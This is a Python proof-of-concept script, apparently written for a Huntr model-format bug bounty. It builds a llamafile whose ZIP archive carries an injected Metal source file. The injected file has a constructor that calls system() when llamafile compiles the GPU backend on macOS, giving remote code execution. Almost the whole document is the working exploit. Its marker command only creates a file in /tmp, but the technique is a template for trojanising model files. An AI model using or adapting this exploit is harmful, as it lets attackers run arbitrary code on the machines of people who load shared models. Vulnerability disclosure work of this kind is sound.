File size: 2,216 Bytes
1057ee2
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/usr/bin/env python3
# llamafile GPU Source Injection PoC Builder
# Huntr Model Format Vulnerability Bounty
# Requirements: pip install gguf (for GGUF bundling); curl for downloads
# Usage: python poc_gpu_inject_builder.py
#
# This script builds poc_gpu_inject.llamafile demonstrating RCE via Metal GPU source injection.
# Run on macOS arm64 with llamafile-0.10.0 and --n-gpu-layers 99 to trigger.
# Observable: /tmp/llamafile_gpu_poc is created before first inference token.

import zipfile, os, subprocess, warnings
warnings.filterwarnings("ignore")

MALICIOUS_M = b"""#include <stdlib.h>
#include <stdio.h>

// Proof-of-concept: arbitrary code runs when llamafile compiles and loads
// this file via cosmo_dlopen() during GPU backend initialisation.
__attribute__((constructor))
static void llamafile_gpu_poc(void) {
    system("touch /tmp/llamafile_gpu_poc");
    fprintf(stderr, "[POC] GPU source injection RCE via ggml-metal-device.m\n");
}

// ---- ORIGINAL ggml-metal-device.m content would follow ----
// (replace the stub below with the real source from llamafile 0.10.0
//  so the Metal dylib builds successfully and the model actually runs)
void ggml_metal_device_stub(void) {}
"""

def build(llamafile_src="llamafile-0.10.0", gguf_src="model.gguf", out="poc_gpu_inject.llamafile"):
    import shutil
    shutil.copy(llamafile_src, out)
    os.chmod(out, 0o755)

    # Append malicious Metal source file (last-wins ZIP semantics)
    with zipfile.ZipFile(out, "a", zipfile.ZIP_STORED) as zf:
        zf.writestr("llama.cpp/ggml/src/ggml-metal/ggml-metal-device.m", MALICIOUS_M)

    # Append model GGUF and .args
    with zipfile.ZipFile(out, "a", zipfile.ZIP_STORED) as zf:
        with open(gguf_src, "rb") as f:
            zf.writestr(os.path.basename(gguf_src), f.read())
        args = f"-m\n/zip/{os.path.basename(gguf_src)}\n--n-gpu-layers\n99\n--cli\n...\n"
        zf.writestr(".args", args.encode())

    print(f"[+] Built: {out} ({os.path.getsize(out):,} bytes)")
    print(f"    Run with: ./{out}")
    print(f"    After launch, check: ls -la /tmp/llamafile_gpu_poc")
    print(f"    If the file exists: RCE via GPU source injection is confirmed.")

if __name__ == "__main__":
    build()